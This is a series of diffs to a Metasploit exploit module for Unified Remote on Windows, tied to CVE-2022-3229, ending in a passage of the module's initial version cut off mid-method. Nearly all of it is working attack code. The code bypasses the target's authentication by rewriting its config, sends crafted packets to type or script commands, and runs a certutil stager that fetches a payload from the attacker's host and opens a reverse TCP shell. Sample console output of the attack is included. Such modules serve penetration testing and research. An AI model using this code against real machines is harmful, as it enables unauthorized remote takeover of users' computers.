-[*] 192.168.2.95:9512 - Server stopped.
-[!] 192.168.2.95:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\tapEZnGskY.exe' on the target
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:9512 - Client name set to: android-iJP3rW13dKjtf8Xz
+[*] 2.2.2.2:9512 - Retrieving server config
+[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
+[*] 2.2.2.2:9512 - Sending handshake
+[*] 2.2.2.2:9512 - Sending empty authentication
+[*] 2.2.2.2:9512 - Opening Start Menu
+[*] 2.2.2.2:9512 - Opening command prompt
+[*] 2.2.2.2:9512 - Typing out payload
+[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
+[*] 2.2.2.2:9512 - Attempting to open payload
+[*] 2.2.2.2:9512 - Server stopped.
+[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\tapEZnGskY.exe' on the target
 [*] Exploit completed, but no session was created.
 ```

--- a/modules/exploits/windows/misc/unified_remote_rce.rb
+++ b/modules/exploits/windows/misc/unified_remote_rce.rb
@@ -36,7 +36,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           [ 'EDB', '49587' ],
           [ 'URL', 'https://www.unifiedremote.com/' ],
-          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ]
+          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ],
+          [ 'URL', 'https://pastebin.com/raw/VMeWckHA' ],
+          [ 'CVE', '' ]
         ],
         'Arch' => [ ARCH_X64, ARCH_X86 ],
         'Platform' => 'win',
@@ -66,7 +68,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptPort.new('WEBSERVER', [true, 'Port Unified Remote web server runs on', 9510]),
         OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
         OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),
-        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', ''])
+        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),
+        OptBool.new('VISIBLE', [false, 'Make exploitation visible to the user', false]),
       ]
     )
   end
@@ -103,39 +106,43 @@ class MetasploitModule < Msf::Exploit::Remote
     initialize_packet << "\x00\x00\x00\x0a\x00"
   end
 
-  def initialize_packet2
-    initialize_packet2 = "\x00\x00\x00\xc8\x00\x01\x08"
-    initialize_packet2 << "Action\x00" # 416374696f6e 00
-    initialize_packet2 << "\x01\x02"
-    initialize_packet2 << "Capabilities\x00" # 4361706162696c6974696573 00
-    initialize_packet2 << "\x04"
-    initialize_packet2 << "Actions\x00" # 416374696f6e73 00
-    initialize_packet2 << "\x01\x04"
-    initialize_packet2 << "Encryption2\x00" # 456e6372797074696f6e32 00
-    initialize_packet2 << "\x01\x04"
-    initialize_packet2 << "Fast\x00" # 46617374 00
-    initialize_packet2 << "\x00\x04"
-    initialize_packet2 << "Grid\x00" # 47726964 00
-    initialize_packet2 << "\x01\x04"
-    initialize_packet2 << "Loading\x00" # 4c6f6164696e6700
-    initialize_packet2 << "\x01\x04"
-    initialize_packet2 << "Sync\x00" # 53796e6300
-    initialize_packet2 << "\x01\x00\x05"
-    initialize_packet2 << "Password\x00" # 50617373776f7264 00
-    initialize_packet2 << 'd634c1dcfdeb8735608a4a104ded4076de766dd61443619809ad7f35858d4492' # 64363334633164636664656238373335363038613461313034646564343037366465373636646436313434333631393830396164376633353835386434343932 seems to be a default
-    initialize_packet2 << "\x00\x08"
-    initialize_packet2 << "Request\x00" # 52657175657374 00
-    initialize_packet2 << "\x01\x05"
-    initialize_packet2 << "Source\x00" # 536f7572636500
+  def empty_authentication
+    empty_authentication = "\x00\x00\x00\xc8\x00\x01\x08"
+    empty_authentication << "Action\x00" # 416374696f6e 00
+    empty_authentication << "\x01\x02"
+    empty_authentication << "Capabilities\x00" # 4361706162696c6974696573 00
+    empty_authentication << "\x04"
+    empty_authentication << "Actions\x00" # 416374696f6e73 00
+    empty_authentication << "\x01\x04"
+    empty_authentication << "Encryption2\x00" # 456e6372797074696f6e32 00
+    empty_authentication << "\x01\x04"
+    empty_authentication << "Fast\x00" # 46617374 00
+    empty_authentication << "\x00\x04"
+    empty_authentication << "Grid\x00" # 47726964 00
+    empty_authentication << "\x01\x04"
+    empty_authentication << "Loading\x00" # 4c6f6164696e6700
+    empty_authentication << "\x01\x04"
+    empty_authentication << "Sync\x00" # 53796e6300
+    empty_authentication << "\x01\x00\x05"
+    empty_authentication << "Password\x00" # 50617373776f7264 00
+    empty_authentication << 'd634c1dcfdeb8735608a4a104ded4076de766dd61443619809ad7f35858d4492' # 64363334633164636664656238373335363038613461313034646564343037366465373636646436313434333631393830396164376633353835386434343932 seems to be a default
+    empty_authentication << "\x00\x08"
+    empty_authentication << "Request\x00" # 52657175657374 00
+    empty_authentication << "\x01\x05"
+    empty_authentication << "Source\x00" # 536f7572636500
     # this line shows up in logs as who connected
-    initialize_packet2 << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00
-    initialize_packet2 << "\x00"
+    empty_authentication << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00
+    empty_authentication << "\x00"
   end
 
+  #############################################
+  # These methods/packets are for visible mode
+  #############################################
+
   def string_header_one(length)
-    # 3 null, then message length
-    string_header_one = "\x00\x00\x00"
-    string_header_one << [length].pack('C').to_s
+    # 2 null, then message length takes next 2 spots
+    string_header_one = "\x00\x00"
+    string_header_one << [length].pack('n').to_s
   end
 
   def string_header_two
@@ -158,30 +165,12 @@ class MetasploitModule < Msf::Exploit::Remote
     string_header_two << "Value\x00" # 56616c7565 00
   end
 
-  def string_header_three
-    string_header_three = "\x00\x00\x00\x00\x05"
-    string_header_three << "Name\x00" # 4e616d65 00
-    string_header_three << "toggle\x00" # 746f67676c65 00
-    string_header_three << "\x00\x08"
-    string_header_three << "Type\x00" # 54797065 00
-    string_header_three << "\x08\x00\x00\x00\x08"
-    string_header_three << "Request\x00" # 52657175657374 00
-    string_header_three << "\x07\x02"
-    string_header_three << "Run\x00" # 52756e 00
-    string_header_three << "\x02"
-    string_header_three << "Extras\x00" # 457874726173 00
-    string_header_three << "\x06"
-    string_header_three << "Values\x00" # 56616c756573 00
-    string_header_three << "\x02\x00\x05"
-    string_header_three << "Value\x00" # 56616c7565 00
-  end
-
   def string_footer
     string_footer = "\x00\x00\x00\x00\x05"
     string_footer << "Name\x00" # 4e616d65 00
     string_footer << "toggle\x00" # 746f67676c65 00
     string_footer << "\x00\x05"
-    string_footer << "Source\x00" # 536f7572636500
+    string_footer << "Source\x00" # 536f75726365 00
     # this line shows up in logs as who connected
     string_footer << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00
     string_footer << "\x00"
@@ -199,6 +188,194 @@ class MetasploitModule < Msf::Exploit::Remote
       contents = "#{string_header_one(contents.length)}#{contents}"
       sock.put(contents)
     end
+  end
+
+  ##############################################
+  # These methods/packets are for invisible mode
+  ##############################################
+
+  def load_unified_command
+    # header: 00 00 00 5e
+    wait = "\x00\x01\x08"
+    wait << "Action\x00" # 416374696f6e 00
+    wait << "\x03\x05" # changed from the previous one from 07 to 03
+    wait << "ID\x00" # 4944 00
+    wait << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00
+    wait << "\x02"
+    wait << "Layout\x00" # 4c61796f7574 00
+    wait << "\x03"
+    wait << "Hash\x00" # 48617368 00
+    wait << "\x9e\xd0\x99:\x00" # 9ed0993a 00
+    wait << "\x08"
+    wait << "Request\x00" # 52657175657374 00
+    wait << "\x03\x05" # changed from the previous one from 07 to 03
+    wait << "Source\x00" # 536f7572636500
+    wait << "#{@client_name}\x00"
+    wait << "\x00"
+  end
+
+  def create_script
+    # header: 00 00 00 e2
+    new_onee = "\x00\x01\x08"
+    new_onee << "Action\x00" # 416374696f6e 00
+    new_onee << "\x07\x05"
+    new_onee << "ID\x00" # 4944 00
+    new_onee << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00
+    new_onee << "\x02"
+    new_onee << "Layout\x00" # 4c61796f7574 00
+    new_onee << "\x06"
+    new_onee << "Controls\x00" # 436f6e74726f6c73 00
+    new_onee << "\x02\x00\x02"
+    new_onee << "OnAction\x00" # 4f6e416374696f6e 00
+    new_onee << "\x02"
+    new_onee << "Extras\x00" # 457874726173 00
+    new_onee << "\x06"
+    new_onee << "Values\x00" # 56616c756573 00
+    new_onee << "\x02\x00\x05"
+    new_onee << "Key\x00" # 4b6579 00
+    new_onee << "Text\x00" # 54657874 00
+    new_onee << "\x05"
+    new_onee << "Value\x00" # 56616c7565 00
+    new_onee << "\x00\x00\x00\x00\x05"
+    new_onee << "Name\x00" # 4e616d65 00
+    new_onee << "update\x00" # 757064617465 00
+    new_onee << "\x00\x08"
+    new_onee << "Type\x00" # 54797065 00
+    new_onee << "\x08\x00\x00\x00\x08"
+    new_onee << "Request\x00" # 52657175657374 00
+    new_onee << "\x07\x02"
+    new_onee << "Run\x00" # 52756e 00
+    new_onee << "\x02"
+    new_onee << "Extras\x00" # 457874726173 00
+    new_onee << "\x06"
+    new_onee << "Values\x00" # 56616c756573 00
+    new_onee << "\x02\x00\x05"
+    new_onee << "Key\x00" # 4b6579 00
+    new_onee << "Text\x00" # 54657874 00
+    new_onee << "\x05"
+    new_onee << "Value\x00" # 56616c7565 00
+    new_onee << "\x00\x00\x00\x00\x05"
+    new_onee << "Name\x00" # 4e616d65 00
+    new_onee << "update\x00" # 757064617465 00
+    new_onee << "\x00\x05"
+    new_onee << "Source\x00" # 536f75726365 00
+    new_onee << "#{@client_name}\x00"
+    new_onee << "\x00"
+  end
+
+  def initialize_keyboard
+    # header 00 00 00 4b
+    new_twoo = "\x00\x01\x08"
+    new_twoo << "Action\x00" # 416374696f6e 00
+    new_twoo << "\x05\x05"
+    new_twoo << "ID\x00" # 4944 00
+    new_twoo << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00
+    new_twoo << "\x08"
+    new_twoo << "Request\x00" # 52657175657374 00
+    new_twoo << "\x05\x05"
+    new_twoo << "Source\x00" # 536f75726365 00
+    new_twoo << "#{@client_name}\x00"
+    new_twoo << "\x00"
+  end
+
+  def add_content(command)
+    # header is dymanic based on length of command
+    new_threee = "\x00\x01\x08"
+    new_threee << "Action\x00" # 416374696f6e 00
+    new_threee << "\x07\x05"
+    new_threee << "ID\x00" # 4944 00
+    new_threee << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00
+    new_threee << "\x02"
+    new_threee << "Layout\x00" # 4c61796f7574 00
+    new_threee << "\x06"
+    new_threee << "Controls\x00" # 436f6e74726f6c73 00
+    new_threee << "\x02\x00\x02"
+    new_threee << "OnAction\x00" # 4f6e416374696f6e 00
+    new_threee << "\x02"
+    new_threee << "Extras\x00" # 457874726173 00
+    new_threee << "\x06"
+    new_threee << "Values\x00" # 56616c756573 00
+    new_threee << "\x02\x00\x05"
+    new_threee << "Key\x00" # 4b6579 00
+    new_threee << "Text\x00" # 54657874 00
+    new_threee << "\x05"
+    new_threee << "Value\x00" # 56616c7565 00
+    new_threee << command
+    new_threee << "\x00\x00\x00\x00\x05"
+    new_threee << "Name\x00" # 4e616d65 00
+    new_threee << "update\x00" # 757064617465 00
+    new_threee << "\x00\x08"
+    new_threee << "Type\x00" # 54797065 00
+    new_threee << "\x08\x00\x00\x00\x08"
+    new_threee << "Request\x00" # 52657175657374 00
+    new_threee << "\x07\x02"
+    new_threee << "Run\x00" # 52756e 00
+    new_threee << "\x02"
+    new_threee << "Extras\x00" # 457874726173 00
+    new_threee << "\x06"
+    new_threee << "Values\x00" # 56616c756573 00
+    new_threee << "\x02\x00\x05"
+    new_threee << "Key\x00" # 4b6579 00
+    new_threee << "Text\x00" # 54657874 00
+    new_threee << "\x05"
+    new_threee << "Value\x00" # 56616c7565 00
+    new_threee << command
+    new_threee << "\x00\x00\x00\x00\x05"
+    new_threee << "Name\x00" # 4e616d65 00
+    new_threee << "update\x00" # 757064617465 00
+    new_threee << "\x00\x05"
+    new_threee << "Source\x00" # 536f75726365 00
+    new_threee << "#{@client_name}\x00"
+    new_threee << "\x00"
+  end
+
+  def execute_script
+    # header 00 00 00 96
+    new_fourr = "\x00\x01\x08"
+    new_fourr << "Action\x00" # 416374696f6e 00
+    new_fourr << "\x07\x05"
+    new_fourr << "ID\x00" # 4944 00
+    new_fourr << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00
+    new_fourr << "\x02"
+    new_fourr << "Layout\x00" # 4c61796f7574 00
+    new_fourr << "\x06"
+    new_fourr << "Controls\x00" # 436f6e74726f6c73 00
+    new_fourr << "\x02\x00\x02"
+    new_fourr << "OnAction\x00" # 4f6e416374696f6e 00
+    new_fourr << "\x05"
+    new_fourr << "Name\x00" # 4e616d65 00
+    new_fourr << "execute\x00" # 65786563757465 00
+    new_fourr << "\x00\x08"
+    new_fourr << "Type\x00" # 54797065 00
+    new_fourr << "\x08\x00\x00\x00\x08"
+    new_fourr << "Request\x00" # 52657175657374 00
+    new_fourr << "\x07\x02"
+    new_fourr << "Run\x00" # 52756e 00
+    new_fourr << "\x05"
+    new_fourr << "Name\x00" # 4e616d65 00
+    new_fourr << "execute\x00" # 65786563757465 00
+    new_fourr << "\x00\x05"
+    new_fourr << "Source\x00" # 536f75726365 00
+    new_fourr << "#{@client_name}\x00"
+    new_fourr << "\x00"
+  end
+
+  def string_header_three
+    string_header_three = "\x00\x00\x00\x00\x05"
+    string_header_three << "Name\x00" # 4e616d65 00
+    string_header_three << "toggle\x00" # 746f67676c65 00
+    string_header_three << "\x00\x08"
+    string_header_three << "Type\x00" # 54797065 00
+    string_header_three << "\x08\x00\x00\x00\x08"
+    string_header_three << "Request\x00" # 52657175657374 00
+    string_header_three << "\x07\x02"
+    string_header_three << "Run\x00" # 52756e 00
+    string_header_three << "\x02"
+    string_header_three << "Extras\x00" # 457874726173 00
+    string_header_three << "\x06"
+    string_header_three << "Values\x00" # 56616c756573 00
+    string_header_three << "\x02\x00\x05"
+    string_header_three << "Value\x00" # 56616c7565 00
   end
 
   def on_request_uri(cli, _req)
@@ -264,7 +441,12 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error('Web interface is disabled. Unable to attempt bypass, assuming no authentication.')
       return nil
     else
-      JSON.parse(body) # split between headers and body
+      # transient error where the JSON doesn't fully receive maybe 1/15 tries in my testing
+      begin
+        return JSON.parse(body) # split between headers and body
+      rescue JSON::ParserError
+        return nil
+      end
     end
   end
 
@@ -339,45 +521,76 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # start actually exploiting the rdp-ish server
     connect
-    print_status('Sending handshake part 1')
+    print_status('Sending handshake')
     sock.put(initialize_packet)
     sleep(datastore['SLEEP'])
-    print_status('Sending handshake part 2')
-    sock.put(initialize_packet2)
+    print_status('Sending empty authentication')
+    sock.put(empty_authentication)
     sleep(datastore['SLEEP'])
 
-    print_status('Opening Start Menu')
-    # original exploit sent it twice, so we follow that
-    send_key(win_key)
-    send_key(win_key)
-    sleep(datastore['SLEEP'])
-
-    print_status('Opening command prompt')
-    'cmd.exe'.split('').each do |letter|
-      send_key(letter)
-    end
-    send_key(ret_key)
-    sleep(datastore['SLEEP'])
-
-    print_status('Typing out payload')
-    # this method was in the original edb exploit, this is significantly faster
-    # and speed is of the essence since remote user input most likely breaks this module
-    start_service('Path' => '/') # start webserver
-
-    print_status('Attempting to pull down payload')
     filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'
     register_file_for_cleanup("#{datastore['path']}#{filename}")
-    "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{datastore['path']}#{filename}".split('').each do |letter|
-      send_key(letter)
-    end
-    send_key(ret_key)
-    sleep(datastore['SLEEP'] * 2) # give time for it to save
+    # this method was in the original edb exploit, this is significantly faster
+    # and speed is of the essence since remote user input most likely breaks this module
+    stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{datastore['path']}#{filename}"
+    start_service('Path' => '/') # start webserver
 
-    print_status('Attempting to open payload')
-    "#{datastore['path']}#{filename} && exit".split('').each do |letter|
-      send_key(letter)
+    if datastore['VISIBLE']
+      print_status('Opening Start Menu')
+      # original exploit sent it twice, so we follow that
+      send_key(win_key)
+      send_key(win_key)
+      sleep(datastore['SLEEP'])
+
+      print_status('Opening command prompt')
+      'cmd.exe'.split('').each do |letter|
+        send_key(letter)
+      end
+      send_key(ret_key)
+      sleep(datastore['SLEEP'])
+
+      print_status('Typing out payload')
+      stager.split('').each do |letter|
+        send_key(letter)
+      end
+      send_key(ret_key)
+      sleep(datastore['SLEEP'] * 2) # give time for it to save
+
+      print_status('Attempting to open payload')
+      "#{datastore['path']}#{filename} && exit".split('').each do |letter|
+        send_key(letter)
+      end
+      send_key(ret_key)
+    else
+      stager << " && #{datastore['path']}#{filename} && exit"
+      print_status('Loading Unified.Command')
+      contents = load_unified_command
+      sock.put("#{string_header_one(contents.length)}#{contents}")
+      sleep(datastore['SLEEP'])
+
+      print_status('Updating Unified.Command')
+      contents = create_script
+      sock.put("#{string_header_one(contents.length)}#{contents}")
+      sleep(datastore['SLEEP'])
+
+      contents = initialize_keyboard
+      sock.put("#{string_header_one(contents.length)}#{contents}")
+      sleep(datastore['SLEEP'])
+
+      print_status('Sending payload')
+      contents = add_content(stager)
+      sock.put("#{string_header_one(contents.length)}#{contents}")
+      sleep(datastore['SLEEP'])
+
+      print_status('Executing script')
+      contents = execute_script
+      sock.put("#{string_header_one(contents.length)}#{contents}")
+      sleep(datastore['SLEEP'])
+
+      contents = create_script
+      sock.put("#{string_header_one(contents.length)}#{contents}")
+      sleep(datastore['SLEEP'])
     end
-    send_key(ret_key)
 
     handler
     disconnect

--- a/modules/exploits/windows/misc/unified_remote_rce.rb
+++ b/modules/exploits/windows/misc/unified_remote_rce.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.unifiedremote.com/' ],
           [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ],
           [ 'URL', 'https://pastebin.com/raw/VMeWckHA' ],
-          [ 'CVE', '' ]
+          [ 'CVE', '2022-3229' ]
         ],
         'Arch' => [ ARCH_X64, ARCH_X86 ],
         'Platform' => 'win',

--- a/modules/exploits/windows/misc/unified_remote_rce.rb
+++ b/modules/exploits/windows/misc/unified_remote_rce.rb
@@ -1,0 +1,345 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Exploit::Remote::Tcp
+  # attempted cmdstger, however there was so much sleep involved for the screen to clear the buffer
+  # that it was going to take hours. The buffer would also overrun itself and the exploit would fail
+  # if not enough sleep time was used. it was a nightmare, not for this exploit.
+  # include Msf::Exploit::CmdStager
+  include Exploit::EXE # generate_payload_exe
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Unified Remote Auth Bypass to RCE',
+        'Description' => %q{
+          This module
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'H4RK3NZ0' # edb
+        ],
+        'References' => [
+          [ 'EDB', '49587' ],
+          [ 'URL', 'https://www.unifiedremote.com/' ],
+          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ]
+        ],
+        'Arch' => [ ARCH_X64, ARCH_X86 ],
+        'Platform' => 'win',
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Targets' => [
+          ['pull', {}],
+        ],
+        'Payload' => {
+          'BadChars' => "\x0a\x00"
+        },
+        'DefaultOptions' => {
+          # since this may get typed out ON SCREEN we want as small a payload as possible
+          'PAYLOAD' => 'windows/shell/reverse_tcp'
+        },
+        'DisclosureDate' => '2021-02-25',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen
+        }
+      )
+    )
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'Port Unified Remote runs on', 9512]),
+        OptPort.new('WEBSERVER', [true, 'Port Unified Remote web server runs on', 9510]),
+        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
+        OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),
+        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', ''])
+      ]
+    )
+  end
+
+  def win_key
+    'LWIN' # 4c57494e
+  end
+
+  def ret_key
+    'RETURN' # 52455455524e
+  end
+
+  def space_key
+    'SPACE' # 5350414345
+  end
+
+  def initialize_packet
+    initialize_packet = "\x00\x00\x00\x85\x00\x01\x08"
+    initialize_packet << "Action\x00" # 416374696f6e 00
+    initialize_packet << "\x00\x05"
+    initialize_packet << "Password\x00" # 50617373776f7264 00
+    initialize_packet << '8e8133b3-a18b-43af-a7cd-e04f747827ce' # 38653831333362332d613138622d343361662d613763642d653034663734373832376365 seems to be a default
+    initialize_packet << "\x00\x05"
+    initialize_packet << "Platform\x00" # 506c6174666f726d 00
+    initialize_packet << "android\x00" # 616e64726f6964 00
+    initialize_packet << "\x08"
+    initialize_packet << "Request\x00" # 52657175657374 00
+    initialize_packet << "\x00\x05"
+    initialize_packet << "Source\x00" # 536f7572636500
+    # this line shows up in logs as who connected
+    initialize_packet << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00
+    initialize_packet << "\x03"
+    initialize_packet << "Version\x00" # 56657273696f6e 00
+    initialize_packet << "\x00\x00\x00\x0a\x00"
+  end
+
+  def initialize_packet2
+    initialize_packet2 = "\x00\x00\x00\xc8\x00\x01\x08"
+    initialize_packet2 << "Action\x00" # 416374696f6e 00
+    initialize_packet2 << "\x01\x02"
+    initialize_packet2 << "Capabilities\x00" # 4361706162696c6974696573 00
+    initialize_packet2 << "\x04"
+    initialize_packet2 << "Actions\x00" # 416374696f6e73 00
+    initialize_packet2 << "\x01\x04"
+    initialize_packet2 << "Encryption2\x00" # 456e6372797074696f6e32 00
+    initialize_packet2 << "\x01\x04"
+    initialize_packet2 << "Fast\x00" # 46617374 00
+    initialize_packet2 << "\x00\x04"
+    initialize_packet2 << "Grid\x00" # 47726964 00
+    initialize_packet2 << "\x01\x04"
+    initialize_packet2 << "Loading\x00" # 4c6f6164696e6700
+    initialize_packet2 << "\x01\x04"
+    initialize_packet2 << "Sync\x00" # 53796e6300
+    initialize_packet2 << "\x01\x00\x05"
+    initialize_packet2 << "Password\x00" # 50617373776f7264 00
+    initialize_packet2 << 'd634c1dcfdeb8735608a4a104ded4076de766dd61443619809ad7f35858d4492' # 64363334633164636664656238373335363038613461313034646564343037366465373636646436313434333631393830396164376633353835386434343932 seems to be a default
+    initialize_packet2 << "\x00\x08"
+    initialize_packet2 << "Request\x00" # 52657175657374 00
+    initialize_packet2 << "\x01\x05"
+    initialize_packet2 << "Source\x00" # 536f7572636500
+    # this line shows up in logs as who connected
+    initialize_packet2 << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00
+    initialize_packet2 << "\x00"
+  end
+
+  def string_header_one(length)
+    # 3 null, then message length
+    string_header_one = "\x00\x00\x00"
+    string_header_one << [length].pack('C').to_s
+  end
+
+  def string_header_two
+    string_header_two = "\x00\x01\x08"
+    string_header_two << "Action\x00" # 416374696f6e 00
+    string_header_two << "\x07\x05"
+    string_header_two << "ID\x00" # 4944 00
+    string_header_two << "Relmtech.Keyboard\x00" # 52656c6d746563682e4b6579626f617264 00
+    string_header_two << "\x02"
+    string_header_two << "Layout\x00" # 4c61796f7574 00
+    string_header_two << "\x06"
+    string_header_two << "Controls\x00" # 436f6e74726f6c73 00
+    string_header_two << "\x02\x00\x02"
+    string_header_two << "OnAction\x00" # 4f6e416374696f6e 00
+    string_header_two << "\x02"
+    string_header_two << "Extras\x00" # 457874726173 00
+    string_header_two << "\x06"
+    string_header_two << "Values\x00" # 56616c756573 00
+    string_header_two << "\x02\x00\x05"
+    string_header_two << "Value\x00" # 56616c7565 00
+  end
+
+  def string_header_three
+    string_header_three = "\x00\x00\x00\x00\x05"
+    string_header_three << "Name\x00" # 4e616d65 00
+    string_header_three << "toggle\x00" # 746f67676c65 00
+    string_header_three << "\x00\x08"
+    string_header_three << "Type\x00" # 54797065 00
+    string_header_three << "\x08\x00\x00\x00\x08"
+    string_header_three << "Request\x00" # 52657175657374 00
+    string_header_three << "\x07\x02"
+    string_header_three << "Run\x00" # 52756e 00
+    string_header_three << "\x02"
+    string_header_three << "Extras\x00" # 457874726173 00
+    string_header_three << "\x06"
+    string_header_three << "Values\x00" # 56616c756573 00
+    string_header_three << "\x02\x00\x05"
+    string_header_three << "Value\x00" # 56616c7565 00
+  end
+
+  def string_footer
+    string_footer = "\x00\x00\x00\x00\x05"
+    string_footer << "Name\x00" # 4e616d65 00
+    string_footer << "toggle\x00" # 746f67676c65 00
+    string_footer << "\x00\x05"
+    string_footer << "Source\x00" # 536f7572636500
+    # this line shows up in logs as who connected
+    string_footer << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00
+    string_footer << "\x00"
+  end
+
+  def send_key(key, press_return: false)
+    if key == ' '
+      key = space_key
+    end
+    contents = "#{string_header_two}#{key}#{string_header_three}#{key}#{string_footer}"
+    contents = "#{string_header_one(contents.length)}#{contents}"
+    sock.put(contents)
+    if press_return
+      contents = "#{string_header_two}#{ret_key}#{string_header_three}#{ret_key}#{string_footer}"
+      contents = "#{string_header_one(contents.length)}#{contents}"
+      sock.put(contents)
+    end
+  end
+
+  def on_request_uri(cli, _req)
+    p = generate_payload_exe
+    send_response(cli, p)
+    print_good("Payload request received, sending #{p.length} bytes of payload for staging")
+  end
+
+  def restart_server
+    http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })
+    # http client overrides sock, so we had to pick one... long live sock
+    request =	"GET /system/restart\r\n"
+    request <<	"Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"
+    request <<	"\r\n"
+
+    http_sock.put(request)
+    disconnect
+    print_status('Sleeping 5 seconds for server to restart')
+    sleep(5)
+  end
+
+  def set_config(config)
+    print_status('Uploading new server config')
+    http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })
+    # http client overrides sock, so we had to pick one... long live sock
+    request =	"POST /system/config\r\n"
+    request <<	"Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"
+    request <<	"Accept: application/json, text/javascript, */*; q=0.01\r\n"
+    request <<	"Content-Type: application/json\r\n"
+    request <<	"X-Requested-With: XMLHttpRequest\r\n"
+    request <<	"Content-Length: #{config.to_json.length}\r\n"
+    request <<	"\r\n"
+    request << config.to_json
+
+    http_sock.put(request)
+    begin
+      http_sock.get_once(-1)
+    rescue EOFError
+      return nil
+    end
+
+    disconnect
+    restart_server
+  end
+
+  def get_config
+    print_status('Retrieving server config')
+    http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })
+    # http client overrides sock, so we had to pick one... long live sock
+    request =	"GET /system/config\r\n"
+    request <<	"Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"
+    request <<	"\r\n"
+
+    http_sock.put(request)
+    begin
+      res = http_sock.get_once(-1)
+    rescue EOFError
+      return nil
+    end
+    disconnect
+    JSON.parse(res.split("\r\n\r\n")[1]) # split between headers and body
+  end
+
+  def check
+    security_mode = get_config
+    if security_mode.nil?
+      CheckCode::Unknown('Unable to get config from web server, unknown status of Unified Remote Controller')
+    end
+    CheckCode::Vulnerable("Unified Remote is vulnerable on port #{security_mode['interfaces']['tcp']['port']} with security mode '#{security_mode['security']['mode']}' (can be bypassed, if needed)")
+  end
+
+  def exploit
+    if datastore['CLIENTNAME'].empty?
+      @client_name = "android-#{Rex::Text.rand_text_alphanumeric(16)}"
+      print_status("Client name set to: #{@client_name}")
+    else
+      @client_name = datastore['CLIENTNAME']
+    end
+    # first grab the config from the HTTP server to determine if we need to disable auth
+    security_mode = get_config
+    reset_security_mode = nil
+    if security_mode['security']['mode'] == 'none'
+      print_good('No security enabled')
+    else
+      print_status("#{security_mode['security']['mode']} mode enabled, password required, bypassing")
+      reset_security_mode = security_mode['security']['mode']
+      security_mode['security']['mode'] = 'none'
+      set_config(security_mode)
+    end
+
+    # now that we have the config, check if theres any users, no passwords (theyre GUIDs) so don't bother DBing them
+    security_mode['security']['users'].each do |account|
+      print_good("Found account: #{account['username']}")
+    end
+
+    # start actually exploiting the rdp-ish server
+    connect
+    print_status('Sending handshake part 1')
+    sock.put(initialize_packet)
+    sleep(datastore['SLEEP'])
+    print_status('Sending handshake part 2')
+    sock.put(initialize_packet2)
+    sleep(datastore['SLEEP'])
+
+    print_status('Opening Start Menu')
+    # original exploit sent it twice, so we follow that
+    send_key(win_key)
+    send_key(win_key)
+    sleep(datastore['SLEEP'])
+
+    print_status('Opening command prompt')
+    'cmd.exe'.split('').each do |letter|
+      send_key(letter)
+    end
+    send_key(ret_key)
+    sleep(datastore['SLEEP'])
+
+    print_status('Typing out payload')
+    # this method was in the original edb exploit, this is significantly faster
+    # and speed is of the essence since remote user input most likely breaks this module
+    start_service('Path' => '/') # start webserver
+
+    print_status('Attempting to pull down payload')
